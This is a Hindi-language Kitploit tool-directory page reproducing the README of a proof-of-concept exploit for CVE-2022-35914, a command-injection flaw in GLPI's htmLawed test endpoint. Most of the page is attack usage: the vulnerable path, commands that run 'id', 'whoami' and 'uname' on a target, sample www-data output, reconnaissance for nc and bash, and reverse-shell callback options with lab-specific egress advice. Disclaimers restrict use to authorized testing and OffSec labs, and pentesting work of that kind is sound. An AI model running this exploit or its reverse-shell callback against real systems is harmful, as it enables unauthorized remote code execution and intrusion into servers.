Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-35914-RCE — CVE-2022-35914 के लिए PoC एक्सप्लॉइट — GLPI v.10.0.2 htmLawed कमांड इंजेक्शन, कमांड निष्पादन, और रिवर्स शेल समर्थन। | Kitploit
उपकरण/GitHubGitHub/cyb3rk0ala/cve-2022-35914-rce
शोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubcyb3rk0ala/cve-2022-35914-rce

CVE-2022-35914-RCE

CVE-2022-35914 के लिए PoC एक्सप्लॉइट — GLPI v.10.0.2 htmLawed कमांड इंजेक्शन, कमांड निष्पादन, और रिवर्स शेल समर्थन।

रिपॉजिटरी देखें
9 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-35914 by cyb3rk0ala

CVE-2022-35914 के लिए PoC — संवेदनशील GLPI इंस्टॉलेशन में htmLawed परीक्षण घटक से संबंधित एक कमांड-इंजेक्शन भेद्यता।

यह टूल संवेदनशील एंडपॉइंट के माध्यम से कमांड निष्पादन प्रदान करता है, और अधिकृत लैब वातावरण के लिए वैकल्पिक कॉलबैक कार्यक्षमता भी शामिल करता है।

अस्वीकरण: यह प्रोजेक्ट केवल अधिकृत सुरक्षा परीक्षण, CTF, OffSec/PG लैब और शैक्षिक उद्देश्यों के लिए है। बिना स्पष्ट प्राधिकरण के सिस्टम के विरुद्ध इसका उपयोग न करें।


भेद्यता

फ़ील्डविवरण
CVECVE-2022-35914
सॉफ़्टवेयरGLPI
घटकhtmLawed
संवेदनशील एंडपॉइंट/vendor/htmlawed/htmlawed/htmLawedTest.php

यह संवेदनशील घटक प्रभावित इंस्टॉलेशन पर विशेष रूप से निर्मित (crafted) पैरामीटरों के माध्यम से कमांड निष्पादन की अनुमति दे सकता है।


विशेषताएँ

  • कमांड निष्पादन
  • स्वचालित टार्गेट URL निर्माण
  • कॉन्फ़िगर करने योग्य टार्गेट HTTP पोर्ट
  • स्वचालित सत्र/टोकन प्राप्ति
  • कमांड-आउटपुट निष्कर्षण
  • टार्गेट जाँच
  • कस्टम User-Agent समर्थन
  • वैकल्पिक कॉलबैक कॉन्फ़िगरेशन
  • रंगीन टर्मिनल आउटपुट
  • Python 3 CLI इंटरफ़ेस

आवश्यकताएँ

Python 3 और आवश्यक निर्भरताएँ।

Kali Linux

root@kitploit:~
sudo apt install python3-requests python3-bs4

वर्चुअल एनवायरनमेंट

root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4

इंस्टॉलेशन

रिपॉज़िटरी क्लोन करें:

root@kitploit:~
git clone https://github.com/cyb3rk0ala/CVE-2022-35914.git
cd CVE-2022-35914

स्क्रिप्ट को निष्पादन योग्य बनाएँ:

root@kitploit:~
chmod +x glpi.py

उपयोग

सहायता

root@kitploit:~
python3 glpi.py -h

बुनियादी कमांड निष्पादन

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'id'

उदाहरण आउटपुट:

root@kitploit:~
[*] Target: http://TARGET_IP:80/vendor/htmlawed/htmlawed/htmLawedTest.php

========== COMMAND OUTPUT ==========
uid=33(www-data) gid=33(www-data) groups=33(www-data)
====================================

कमांड निष्पादन

-c विकल्प निष्पादित किए जाने वाले कमांड को निर्दिष्ट करता है।

वर्तमान उपयोगकर्ता

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'whoami'

वर्तमान विशेषाधिकार

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'id'

ऑपरेटिंग सिस्टम

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'uname -a'

उपलब्ध उपयोगिताएँ

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'which bash'
python3 glpi.py -u TARGET_IP -c 'which python3'
python3 glpi.py -u TARGET_IP -c 'which php'
python3 glpi.py -u TARGET_IP -c 'which nc'

विकल्प


टार्गेट पोर्ट

-p / --rport विकल्प उस पोर्ट को निर्दिष्ट करता है जहाँ संवेदनशील GLPI वेब सेवा चल रही है।

डिफ़ॉल्ट:

root@kitploit:~
80

उदाहरण:

root@kitploit:~
python3 glpi.py -u TARGET_IP -p 80 -c 'id'

टार्गेट जाँच

कमांड निष्पादित किए बिना यह सत्यापित करने के लिए कि htmLawed परीक्षण पृष्ठ उपलब्ध है, --check का उपयोग करें:

root@kitploit:~
python3 glpi.py -u TARGET_IP --check

कस्टम User-Agent

कस्टम HTTP User-Agent इस प्रकार प्रदान किया जा सकता है:

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    --user-agent 'Mozilla/5.0'

रिवर्स शेल

स्क्रिप्ट वैकल्पिक कॉलबैक पैरामीटर का समर्थन करती है:

root@kitploit:~
-l   Callback/listener IP
-lp  Callback/listener port

उदाहरण:

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

इस उदाहरण में:

root@kitploit:~
Target:   TARGET_IP:80
Callback: LHOST:80

दोनों पोर्ट के अलग-अलग उद्देश्य हैं:

root@kitploit:~
-p   = Target GLPI HTTP port
-lp  = Callback/listener port

OffSec लैब नोट

OffSec लैब वातावरण में परीक्षण के दौरान, कॉलबैक TCP पोर्ट 80 पर सफलतापूर्वक कार्य करता था।

लैब नेटवर्क और एग्रेस फ़िल्टरिंग के आधार पर, 4444 जैसे अन्य कॉलबैक पोर्ट टाइमआउट हो सकते हैं।

परीक्षण किए गए वातावरण के लिए:

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

लिसनर को Kali VPN इंटरफ़ेस पर TCP पोर्ट 80 का उपयोग करके कॉन्फ़िगर किया गया था।

महत्वपूर्ण: कॉलबैक के लिए पोर्ट 80 का उपयोग एक वातावरण-विशिष्ट अवलोकन है। यह CVE-2022-35914 की आवश्यकता नहीं है।


समस्या निवारण

कमांड निष्पादन कार्य करता है लेकिन कॉलबैक नहीं करता

पहले कमांड निष्पादन सत्यापित करें:

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'id'

जाँच करें कि आवश्यक उपयोगिताएँ मौजूद हैं:

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'which bash'
python3 glpi.py -u TARGET_IP -c 'which python3'
python3 glpi.py -u TARGET_IP -c 'which php'
python3 glpi.py -u TARGET_IP -c 'which nc'

यदि कमांड निष्पादन कार्य करता है लेकिन कॉलबैक टाइमआउट हो जाता है, तो VPN रूटिंग और कॉलबैक पोर्ट की जाँच करें।


कमांड आउटपुट गलत दिखता है

यदि कमांड-आउटपुट पार्सिंग विफल हो जाती है, तो पूर्ण HTTP प्रतिक्रिया इसमें सहेजी जाती है:

root@kitploit:~
/tmp/glpi.html

इसे इसके साथ निरीक्षण करें:

root@kitploit:~
less /tmp/glpi.html

या:

root@kitploit:~
mousepad /tmp/glpi.html

उदाहरण वर्कफ़्लो

1. टार्गेट की जाँच करें

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    --check

2. कमांड निष्पादन की पुष्टि करें

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -c 'id'

3. वर्तमान उपयोगकर्ता की पहचान करें

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -c 'whoami'

4. उपलब्ध टूल की जाँच करें

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -c 'which nc'

5. कॉलबैक कॉन्फ़िगर करें

परीक्षण किए गए OffSec लैब वातावरण के लिए:

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक और अधिकृत सुरक्षा-परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

इस सॉफ़्टवेयर से जुड़े किसी भी दुरुपयोग, क्षति, अनधिकृत पहुँच या अवैध गतिविधि के लिए लेखक ज़िम्मेदार नहीं है।

किसी सिस्टम का परीक्षण करने से पहले हमेशा स्पष्ट प्राधिकरण प्राप्त करें।


लेखक

cyb3rk0ala


CVE

CVE-2022-35914


प्रोजेक्ट

CVE-2022-35914 by cyb3rk0ala

टूल डाउनलोड करें
विकल्पविवरणडिफ़ॉल्ट
-u, --urlटार्गेट URL या IP पताआवश्यक
-c, --cmdनिष्पादित करने हेतु कमांडid
--checkकमांड निष्पादित किए बिना टार्गेट की जाँच करेंअक्षम
--user-agentकस्टम HTTP User-Agentडिफ़ॉल्ट
-p, --rportटार्गेट HTTP सेवा पोर्ट80
-l, --lhostकॉलबैक/लिसनर IP पता—
-lp, --lportकॉलबैक/लिसनर पोर्ट—